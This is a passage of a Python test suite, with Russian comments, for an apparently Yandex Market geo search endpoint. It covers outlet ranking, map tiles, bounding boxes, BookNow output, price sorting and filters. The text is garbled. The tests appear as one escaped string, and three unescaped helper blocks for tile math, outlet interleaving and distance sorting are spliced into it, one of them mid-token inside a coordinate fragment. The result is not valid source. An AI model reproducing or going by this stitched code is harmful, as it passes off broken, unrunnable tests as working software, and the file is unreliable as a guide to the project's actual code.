по два аутлета от магазина подряд)\n response = self.report.request_json(\n 'place=geo&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.4,55.4&hyperid=301&rids=0'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 9, \"shops\": 3, \"shopOutlets\": 9}}, preserve_order=True)\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good12\"}, \"outlet\": {\"id\": \"211\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good12\"}, \"outlet\": {\"id\": \"214\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good_PostTerm_6\"}, \"outlet\": {\"id\": \"261\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good_PostTerm_6\"}, \"outlet\": {\"id\": \"262\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good31\"}, \"outlet\": {\"id\": \"231\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good31\"}, \"outlet\": {\"id\": \"232\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good12\"}, \"outlet\": {\"id\": \"212\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good12\"}, \"outlet\": {\"id\": \"213\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good31\"}, \"outlet\": {\"id\": \"233\"}},\n ],\n preserve_order=True,\n )\n\n response = self.report.request_json(\n 'place=geo&how=distance&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.4,55.4&hyperid=301&rids=0&touch=1'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 9, \"shops\": 3, \"shopOutlets\": 9}}, preserve_order=True)\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good31\"}, \"outlet\": {\"id\": \"231\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good12\"}, \"outlet\": {\"id\": \"211\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good12\"}, \"outlet\": {\"id\": \"214\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good12\"}, \"outlet\": {\"id\": \"212\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good31\"}, \"outlet\": {\"id\": \"232\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good12\"}, \"outlet\": {\"id\": \"213\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good31\"}, \"outlet\": {\"id\": \"233\"}},\n ],\n preserve_order=True,\n )\n\n def test_geo_bounding_empty(self):\n # Что тестируем: выдачу с учетом баундинга пустом квадрате\n response = self.report.request_json(\n 'place=geo&how=distance&geo-location=37.15,55.65&geo_bounds_lb=37.0,55.6&geo_bounds_rt=37.2,55.8&hyperid=301&rids=0'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 0, \"shops\": 0, \"shopOutlets\": 0}}, preserve_order=True)\n self.assertFragmentNotIn(response, {\"entity\": \"offer\"}, preserve_order=True)\n\n def test_tile_format(self):\n # Что тестируем: формат выдачи тайла\n response = self.report.request_json('place=geo&tile=619,321&zoom=10&hyperid=301&show-outlet=tiles&rids=0')\n self.assertFragmentIn(\n response,\n {\n \"tiles\": [\n {\n \"entity\": \"tile\",\n \"coord\": {\"x\": 619, \"y\": 321, \"zoom\": 10},\n \"outlets\": [\n {\n \"entity\": \"outlet\",\n \"id\": \"216\",\n \"type\": \"pickup\",\n \"gpsCoord\": {\"longitude\": \"37.7\", \"latitude\": \"55.7\"},\n }\n ],\n }\n ]\n },\n preserve_order=True,\n )\n\n def test_multiple_tiles(self):\n # Что тестируем: выдачу аутлетов в группе тайлов\n response = self.report.request_json(\n 'place=geo&tile=617,322&tile=617,323&tile=617,324&zoom=10&hyperid=301&show-outlet=tiles&rids=0'\n )\n self.assertFragmentIn(\n response,\n {\n \"tiles\": [\n {\"coord\": {\"x\": 617, \"y\": 
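# The tile tests address map tiles as (x, y, zoom). A standard spherical
# Web Mercator mapping from GPS to tile indices is sketched below for
# illustration; the fixtures appear to use an ellipsoidal (WGS84) Mercator
# (as on Yandex.Maps), so the y row computed here can come out one off.
import math


def gps_to_tile(lon, lat, zoom):
    n = 2 ** zoom
    x = int((lon + 180.0) / 360.0 * n)
    y = int((1.0 - math.asinh(math.tan(math.radians(lat))) / math.pi) / 2.0 * n)
    return x, y


# At zoom 10 a longitude of 37.7 falls into tile column 619, matching the
# "coord": {"x": 619, ...} fragment asserted above.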
322}, \"outlets\": [{\"id\": \"221\"}]},\n {\"coord\": {\"x\": 617, \"y\": 323}, \"outlets\": [{\"id\": \"212\"}, {\"id\": \"232\"}]},\n {\"coord\": {\"x\": 617, \"y\": 324}, \"outlets\": [{\"id\": \"211\"}, {\"id\": \"231\"}, {\"id\": \"261\"}]},\n ]\n },\n preserve_order=True,\n )\n\n def test_empty_tile(self):\n # Что тестируем: выдачу пустого тайла\n response = self.report.request_json('place=geo&tile=617,321&zoom=10&hyperid=301&show-outlet=tiles&rids=0')\n self.assertFragmentIn(\n response, {\"tiles\": [{\"coord\": {\"x\": 617, \"y\": 321, \"zoom\": 10}, \"outlets\": []}]}, preserve_order=True\n )\n self.assertFragmentNotIn(response, {\"outlets\": [{\"entity\": \"outlet\"}]}, preserve_order=True)\n\n def test_total_renderable(self):\n \"\"\"Проверяется, что общее количество для показа = total\"\"\"\n request = 'place=geo&show-book-now-only=1&point_id=211&hyperid=301&rids=0&grhow=offer'\n response = self.report.request_json(request)\n self.assertFragmentIn(response, {\"total\": 3})\n self.assertEqual(3, response.count({\"entity\": \"offer\"}))\n response = self.report.request_json(request + '&numdoc=1')\n self.assertFragmentIn(response, {\"total\": 3})\n self.assertEqual(1, response.count({\"entity\": \"offer\"}))\n self.access_log.expect(total_renderable='3').times(2)\n\n def test_is_main(self):\n # Что тестируем: признак is-main в аутлете. Is-main аутлеты должны располагаться выше не-is-main\n response = self.report.request_json('place=geo&hyperid=302&rids=0')\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"254\"}},\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"251\"}},\n ],\n preserve_order=True,\n )\n\n def test_pickup_price(self):\n # Что тестируем: признак pickup-price в аутлете. Аутлеты ранжируются по возрастанию цены и\n # возрастанию расстояния до пользователя в случае равенства цен\n unified_off_flags = '&rearr-factors=market_dsbs_tariffs=0;market_unified_tariffs=0'\n response = self.report.request_json('place=geo&geo-location=37.15,55.15&hyperid=302&rids=0' + unified_off_flags)\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"252\"}},\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"253\"}},\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"251\"}},\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"254\"}},\n ],\n preserve_order=True,\n )\n\n def test_geo_output_format_book_now(self):\n # Что тестируем: формат выдаче аутлета в BookNow-выдаче (show-book-now-only=1)\n response = self.report.request_json(\n 'place=geo&hyperid=301&show-book-now-only=1&rids=0&show-urls=geo,geoOutlet,geoPointInfo'\n )\n self.assertFragmentIn(\n response,\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"good21\"},\n \"bundleCount\": 1,\n \"bundled\": {\"modelId\": 301, \"outletId\": 221, \"count\": 1},\n \"outlet\": {\n \"entity\": \"outlet\",\n \"id\": \"221\",\n \"name\": \"OUTLET-102-221\",\n \"type\": \"store\",\n \"email\": \"\",\n \"shop\": {\"id\": 102},\n \"address\": {\"locality\": \"\", \"street\": \"\", \"building\": \"\", \"block\": \"\", \"note\": \"\"},\n \"region\": {\n \"entity\": \"region\",\n \"id\": 1,\n \"name\": u\"Город\",\n \"lingua\": {\"name\": {\"genitive\": u\"Город\", \"preposition\": \" \", \"prepositional\": u\"Город\"}},\n },\n \"gpsCoord\": {\"longitude\": \"37.1\", \"latitude\": \"55.5\"},\n \"bundleCount\": 2,\n \"bundled\": {\"modelId\": 301, \"count\": 2},\n },\n },\n preserve_order=True,\n )\n\n # Проверяем наличие записей в логах\n self.click_log.expect(ClickType.GEO, 
shop_id=102)\n self.click_log.expect(ClickType.GEO_OUTLET, shop_id=102)\n self.click_log.expect(ClickType.GEO_OUTLET_INFO, shop_id=102)\n self.show_log.expect(url='//market.yandex.ru/geo?fesh=102&offerid=2b0-iAnHLZST2Ekoq4xElg')\n self.show_log.expect(url='//market.yandex.ru/geo?fesh=102&offerid=2b0-iAnHLZST2Ekoq4xElg&point_id=221')\n self.show_log.expect(\n url='//market.yandex.ru/gate/maps/getpointinfo.xml?offerid=2b0-iAnHLZST2Ekoq4xElg&point_id=221'\n )\n\n def test_geo_output_sorting_book_now(self):\n # Что тестируем: дефолтное ранжирование аутлетов в рамках BookNow с geo-sort-gran=1\n # Также тестируем пейджинг\n # См. описание https://wiki.yandex-team.ru/market/projects/multiregion/projects/pickupinstore/dev/report/geo-response/#ranzhirovanietovarovnakarte\n response = self.report.request_json(\n 'place=geo&show-book-now-only=1&numdoc=3&geo-sort-gran=1&hyperid=301&rids=0'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 11, \"shops\": 3, \"shopOutlets\": 11}}, preserve_order=True)\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good21\"}, \"outlet\": {\"id\": \"221\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good13\"}, \"outlet\": {\"id\": \"211\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good31\"}, \"outlet\": {\"id\": \"231\"}},\n ],\n preserve_order=True,\n )\n response = self.report.request_json(\n 'place=geo&show-book-now-only=1&numdoc=3&page=2&geo-sort-gran=1&hyperid=301&rids=0'\n )\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good21\"}, \"outlet\": {\"id\": \"222\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good13\"}, \"outlet\": {\"id\": \"212\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good32\"}, \"outlet\": {\"id\": \"232\"}},\n ],\n preserve_order=True,\n )\n response = self.report.request_json(\n 'place=geo&show-book-now-only=1&numdoc=3&page=3&geo-sort-gran=1&hyperid=301&rids=0'\n )\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"213\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good32\"}, \"outlet\": {\"id\": \"233\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"214\"}},\n ],\n preserve_order=True,\n )\n response = self.report.request_json(\n 'place=geo&show-book-now-only=1&numdoc=3&page=4&geo-sort-gran=1&hyperid=301&rids=0'\n )\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"215\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"216\"}},\n ],\n preserve_order=True,\n )\n\n def test_geo_output_distance_sorting_book_now(self):\n # Что тестируем: ранжирование аутлетов по расстоянию до пользователя в рамках BookNow с geo-sort-gran=1\n # Также тестируем пейджинг\n # См. 
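# geo-sort-gran controls how outlets interleave between shops: with
# geo-sort-gran=1 the ranking takes one outlet per shop in turn, with the
# default of 2 it takes two in a row. A minimal interleaving sketch under
# that assumption (not the report's actual code):
from itertools import islice


def interleave_outlets(outlets_by_shop, gran=2):
    """outlets_by_shop: {shop_id: [outlet_id, ...]} with each list pre-ranked."""
    queues = {shop: iter(outs) for shop, outs in outlets_by_shop.items()}
    result = []
    while queues:
        for shop in list(queues):
            chunk = list(islice(queues[shop], gran))
            if not chunk:
                del queues[shop]  # shop exhausted, drop it from the rotation
            result.extend(chunk)
    return result


# With gran=1 and shop queues ordered 102, 101, 103 this yields
# [221, 211, 231, 222, 212, 232] -- the first two pages asserted above.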
описание https://wiki.yandex-team.ru/market/projects/multiregion/projects/pickupinstore/dev/report/geo-response/#ranzhirovanietovarovnakarte\n response = self.report.request_json(\n 'place=geo&how=distance&numdoc=4&geo-location=37.15,55.15&show-book-now-only=1&geo-sort-gran=1&numdoc=20&hyperid=301&rids=0'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 11, \"shops\": 3, \"shopOutlets\": 11}}, preserve_order=True)\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good31\"}, \"outlet\": {\"id\": \"231\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good13\"}, \"outlet\": {\"id\": \"211\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good21\"}, \"outlet\": {\"id\": \"221\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good32\"}, \"outlet\": {\"id\": \"232\"}},\n ],\n preserve_order=True,\n )\n response = self.report.request_json(\n 'place=geo&how=distance&page=2&numdoc=4&geo-location=37.15,55.15&show-book-now-only=1&geo-sort-gran=1&numdoc=20&hyperid=301&rids=0'\n )\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good13\"}, \"outlet\": {\"id\": \"212\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good21\"}, \"outlet\": {\"id\": \"222\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good32\"}, \"outlet\": {\"id\": \"233\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"213\"}},\n ],\n preserve_order=True,\n )\n response = self.report.request_json(\n 'place=geo&how=distance&page=3&numdoc=4&geo-location=37.15,55.15&show-book-now-only=1&geo-sort-gran=1&numdoc=20&hyperid=301&rids=0'\n )\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"214\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"215\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"216\"}},\n ],\n preserve_order=True,\n )\n\n def test_geo_bounding_booknow(self):\n # Что тестируем: выдачу с учетом баундинга с дефолтным ранжированием и с ранжированием по удаленности\n # В выдаче должны остаться аутлеты 211 и 231 (см \"карту\")\n response = self.report.request_json(\n 'place=geo&show-book-now-only=1&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.2,55.2&hyperid=301&rids=0'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 2, \"shops\": 2, \"shopOutlets\": 2}}, preserve_order=True)\n self.assertFragmentIn(\n response,\n [\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"good13\"},\n \"bundleCount\": 3,\n \"bundled\": {\"modelId\": 301, \"outletId\": 211, \"count\": 3},\n \"outlet\": {\"id\": \"211\", \"bundleCount\": 2, \"bundled\": {\"modelId\": 301, \"count\": 2}},\n },\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"good31\"},\n \"bundleCount\": 2,\n \"bundled\": {\"modelId\": 301, \"outletId\": 231, \"count\": 2},\n \"outlet\": {\n \"id\": \"231\",\n \"bundleCount\": 1,\n \"bundled\": {\"modelId\": 301, \"count\": 1},\n },\n },\n ],\n preserve_order=True,\n )\n\n response = self.report.request_json(\n 'place=geo&show-book-now-only=1&how=distance&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.2,55.2&hyperid=301&rids=0'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 2, \"shops\": 2, \"shopOutlets\": 2}}, preserve_order=True)\n self.assertFragmentIn(\n response,\n [\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"good31\"},\n 
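# how=distance ranks outlets by their distance to the geo-location parameter.
# A haversine-based sketch of that ordering (illustrative; the report's exact
# metric is not shown in this file):
import math


def haversine_km(lon1, lat1, lon2, lat2):
    lon1, lat1, lon2, lat2 = map(math.radians, (lon1, lat1, lon2, lat2))
    h = math.sin((lat2 - lat1) / 2) ** 2 + math.cos(lat1) * math.cos(lat2) * math.sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371 * math.asin(math.sqrt(h))


def sort_by_distance(outlets, user_lon, user_lat):
    """outlets: [(outlet_id, lon, lat), ...] -> ids ordered nearest first."""
    return [o for o, _, _ in sorted(outlets, key=lambda t: haversine_km(user_lon, user_lat, t[1], t[2]))]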
\"bundleCount\": 2,\n \"bundled\": {\"modelId\": 301, \"outletId\": 231, \"count\": 2},\n \"outlet\": {\n \"id\": \"231\",\n \"bundleCount\": 1,\n \"bundled\": {\"modelId\": 301, \"count\": 1},\n },\n },\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"good13\"},\n \"bundleCount\": 3,\n \"bundled\": {\"modelId\": 301, \"outletId\": 211, \"count\": 3},\n \"outlet\": {\n \"id\": \"211\",\n \"bundleCount\": 2,\n \"bundled\": {\"modelId\": 301, \"count\": 2},\n },\n },\n ],\n preserve_order=True,\n )\n\n def test_multiple_tiles_booknow(self):\n # Что тестируем: выдачу аутлетов в группе тайлов в BookNow выдаче\n response = self.report.request_json(\n 'place=geo&show-book-now-only=1&tile=617,322&tile=618,322&tile=619,322&zoom=10&hyperid=301&show-outlet=tiles&rids=0'\n )\n self.assertFragmentIn(\n response,\n {\n \"tiles\": [\n {\"coord\": {\"x\": 617, \"y\": 322}, \"outlets\": [{\"id\": \"221\"}]},\n {\"coord\": {\"x\": 618, \"y\": 322}, \"outlets\": [{\"id\": \"215\"}, {\"id\": \"222\"}]},\n {\"coord\": {\"x\": 619, \"y\": 322}, \"outlets\": []},\n ]\n },\n preserve_order=True,\n )\n\n def test_single_outlet_booknow(self):\n # Что тестируем: режим выдачи для одного аутлета, сразу с BookNow\n response = self.report.request_json(\n 'place=geo&show-book-now-only=1&point_id=211&hyperid=301&rids=0&grhow=offer'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 3, \"shops\": 1, \"shopOutlets\": 1}}, preserve_order=True)\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good12\"}, \"outlet\": {\"id\": \"211\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good13\"}, \"outlet\": {\"id\": \"211\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"211\"}},\n ],\n preserve_order=True,\n )\n\n def test_top5_geo(self):\n # Что тестируем: режим выдачи Топ5-гео, сразу с BookNow\n response = self.report.request_json(\n 'place=geo&show-book-now-only=1&numdoc=5&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.4,55.4&geo-sort-gran=1&hyperid=301&rids=0'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 7, \"shops\": 2, \"shopOutlets\": 7}}, preserve_order=True)\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good13\"}, \"outlet\": {\"id\": \"211\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good31\"}, \"outlet\": {\"id\": \"231\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good13\"}, \"outlet\": {\"id\": \"212\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good32\"}, \"outlet\": {\"id\": \"232\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"213\"}},\n ],\n preserve_order=True,\n )\n\n def test_sorting_aprice(self):\n # Что тестируем: сортировку по возрастанию цены\n response = self.report.request_json(\n 'place=geo&how=aprice&geo-location=37.15,55.15&geo-sort-gran=2&numdoc=20&hyperid=301&rids=0&pp=18'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 15, \"shops\": 5, \"shopOutlets\": 15}}, preserve_order=True)\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good14\"}, \"outlet\": {\"id\": \"211\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good14\"}, \"outlet\": {\"id\": \"214\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good22\"}, \"outlet\": {\"id\": \"221\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good22\"}, \"outlet\": {\"id\": \"222\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": 
\"good33\"}, \"outlet\": {\"id\": \"231\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good33\"}, \"outlet\": {\"id\": \"232\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good41\"}, \"outlet\": {\"id\": \"241\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good_PostTerm_6\"}, \"outlet\": {\"id\": \"261\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good_PostTerm_6\"}, \"outlet\": {\"id\": \"262\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good14\"}, \"outlet\": {\"id\": \"212\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good14\"}, \"outlet\": {\"id\": \"213\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good22\"}, \"outlet\": {\"id\": \"223\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good33\"}, \"outlet\": {\"id\": \"233\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good14\"}, \"outlet\": {\"id\": \"215\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good14\"}, \"outlet\": {\"id\": \"216\"}},\n ],\n preserve_order=True,\n )\n\n def test_sorting_aprice_booknow(self):\n # Что тестируем: сортировку по возрастанию цены в BookNow-выдаче\n response = self.report.request_json(\n 'place=geo&how=aprice&show-book-now-only=1&geo-location=37.15,55.15&geo-sort-gran=2&numdoc=20&hyperid=301&rids=0&pp=18'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 11, \"shops\": 3, \"shopOutlets\": 11}}, preserve_order=True)\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good13\"}, \"outlet\": {\"id\": \"211\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good13\"}, \"outlet\": {\"id\": \"212\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good31\"}, \"outlet\": {\"id\": \"231\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good32\"}, \"outlet\": {\"id\": \"232\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good21\"}, \"outlet\": {\"id\": \"221\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good21\"}, \"outlet\": {\"id\": \"222\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"214\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"213\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good32\"}, \"outlet\": {\"id\": \"233\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"215\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"216\"}},\n ],\n preserve_order=True,\n )\n\n def test_sorting_dprice(self):\n # Что тестируем: сортировку по убыванию цены\n response = self.report.request_json(\n 'place=geo&how=dprice&geo-location=37.15,55.15&geo-sort-gran=2&numdoc=20&hyperid=301&rids=0&pp=18'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 15, \"shops\": 5, \"shopOutlets\": 15}}, preserve_order=True)\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good12\"}, \"outlet\": {\"id\": \"211\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good12\"}, \"outlet\": {\"id\": \"214\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good21\"}, \"outlet\": {\"id\": \"221\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good21\"}, \"outlet\": {\"id\": \"222\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good31\"}, \"outlet\": {\"id\": \"231\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good31\"}, \"outlet\": {\"id\": \"232\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good41\"}, \"outlet\": {\"id\": 
\"241\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good_PostTerm_6\"}, \"outlet\": {\"id\": \"261\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good_PostTerm_6\"}, \"outlet\": {\"id\": \"262\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good12\"}, \"outlet\": {\"id\": \"212\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good12\"}, \"outlet\": {\"id\": \"213\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good21\"}, \"outlet\": {\"id\": \"223\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good31\"}, \"outlet\": {\"id\": \"233\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good12\"}, \"outlet\": {\"id\": \"215\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good12\"}, \"outlet\": {\"id\": \"216\"}},\n ],\n preserve_order=True,\n )\n\n def test_sorting_dprice_booknow(self):\n # Что тестируем: сортировку по убыванию цены для BookNow-выдачи\n response = self.report.request_json(\n 'place=geo&how=dprice&show-book-now-only=1&geo-location=37.15,55.15&geo-sort-gran=2&numdoc=20&hyperid=301&rids=0&pp=18'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 11, \"shops\": 3, \"shopOutlets\": 11}}, preserve_order=True)\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good13\"}, \"outlet\": {\"id\": \"211\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good13\"}, \"outlet\": {\"id\": \"212\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good31\"}, \"outlet\": {\"id\": \"231\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good32\"}, \"outlet\": {\"id\": \"232\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good21\"}, \"outlet\": {\"id\": \"221\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good21\"}, \"outlet\": {\"id\": \"222\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"213\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"214\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good32\"}, \"outlet\": {\"id\": \"233\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"215\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"216\"}},\n ],\n preserve_order=True,\n )\n\n def test_price_filter(self):\n # Что тестируем: фильтрацию по цене\n response = self.report.request_json('place=geo&mcpricefrom=95&mcpriceto=105&hyperid=301&rids=0&pp=18')\n\n # Проверяем, что фильтр работает - аутлета, в котором нет подходящего оффера, нет в выдаче\n self.assertFragmentIn(response, {\"search\": {\"total\": 12, \"shops\": 3, \"shopOutlets\": 12}}, preserve_order=True)\n\n def test_warranty_filter(self):\n # Что тестируем: фильтрацию по наличию гарантиии\n response = self.report.request_json('place=geo&manufacturer_warranty=1&hid=503&rids=0&pp=18')\n\n # Проверяем, что фильтр работает - на выдаче нужный оффер\n self.assertFragmentIn(response, {\"search\": {\"total\": 1, \"shops\": 1, \"shopOutlets\": 1}}, preserve_order=True)\n self.assertFragmentIn(response, {\"titles\": {\"raw\": \"good52\"}}, preserve_order=True)\n\n def test_qrfrom_filter(self):\n # Что тестируем: фильтрацию по рейтингу магазина\n response = self.report.request_json('place=geo&qrfrom=4&hid=503&rids=0&pp=18')\n\n # Проверяем, что фильтр работает - аутлета, в котором нет подходящего оффера, нет в выдаче\n self.assertFragmentIn(response, {\"search\": {\"total\": 1, \"shops\": 1, \"shopOutlets\": 1}}, preserve_order=True)\n\n def 
test_offer_shipping_filter(self):\n # Что тестируем: фильтрацию по типу доставки\n\n # Запрос &offer-shipping=store\n response = self.report.request_json('place=geo&offer-shipping=store&hid=503&rids=0&pp=18')\n\n # Проверяем, что фильтр работает - аутлетов типа pickup, нет в выдаче\n self.assertFragmentNotIn(response, {\"type\": \"pickup\"}, preserve_order=True)\n\n # Запрос &offer-shipping=pickup\n response = self.report.request_json('place=geo&offer-shipping=pickup&hid=503&rids=0&pp=18')\n\n # Проверяем, что фильтр работает - аутлетов типа store, нет в выдаче\n self.assertFragmentNotIn(response, {\"type\": \"store\"}, preserve_order=True)\n\n # Что тестируем: отображение в выдаче только постомат-аутлетов\n response = self.report.request_json(\n 'place=geo&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.2,55.2&hyperid=301&rids=0&offer-shipping=postomat'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 1, \"shops\": 1, \"shopOutlets\": 1}}, preserve_order=True)\n self.assertFragmentIn(\n response,\n [\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"good_PostTerm_6\"},\n \"bundleCount\": 